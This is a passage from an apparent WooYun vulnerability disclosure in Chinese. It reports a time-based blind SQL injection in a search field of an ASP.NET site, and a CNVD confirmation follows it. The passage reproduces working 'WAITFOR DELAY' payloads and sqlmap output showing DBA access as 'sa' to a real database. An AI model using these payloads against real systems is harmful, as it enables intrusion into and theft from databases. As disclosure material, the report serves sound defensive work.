EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%'; WAITFOR DELAY '0:0:5'--&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=
4
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE1OTg5MDYxOTYPZBYCAgMPZBYGAgcPEA8WBh4NRGF0YVR
leHRGaWVsZAUIVXNlck5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZVc2VySUQeC18hRGF0YUJvdW5kZ2QQFQQ
Gd2RyMTIzB21pYW8xMjMLcGFubWluZzEyMzELcGVpbGluZzEyNTgVBAE5AjE0AjM2AjM5FCsDBGdnZ2c
WAWZkAgkPEA8WBh8ABQ5Nb2R1bGVUeXBlTmFtZR8BBQxNb2R1bGVUeXBlSUQfAmdkEBUFDOebtOaSree
uoeeQhgzngrnmkq3nrqHnkIYM5p2D6ZmQ566h55CGDOezu+e7n+euoeeQhgznlKjmiLfnrqHnkIYVBQE
1ATQBMwEyATEUKwMFZ2dnZ2cWAWZkAgsPPCsADQBkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2t
LZXlfXxYBBQ1idG5TZWFyY2hVc2VyBQpNb2R1bGVMaXN0D2dk+xNkZaqJ2CB9tm9KuBIYYBJrbQ4=&__
EVENTVALIDATION=/wEWDAK/wfuSBgL3+7WiDgLIvLpRAqyliowMArSl+o8MAral8o8MAralpowMAt78
kaQCAtn8kaQCAtj8kaQCAtv8kaQCAtr8kaQCE6GHT/1b7g7aGY4ZEaR7/b3if+I=&txtSearchUser=1
2%' WAITFOR DELAY '0:0:5'--&ModuleTypeList=5&btnSearchUser.x=8&btnSearchUser.y=4
---
[02:06:03] [INFO] testing Microsoft SQL Server
[02:06:04] [INFO] confirming Microsoft SQL Server
[02:06:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[02:06:04] [INFO] fetching current user
current user:    'sa'
[02:06:04] [INFO] fetching current database
current database:    'GenMedia'
[02:06:05] [INFO] testing if current user is DBA
current user is DBA:    True

漏洞证明:

如上

修复方案:

过滤修复
权限控制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-06 08:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无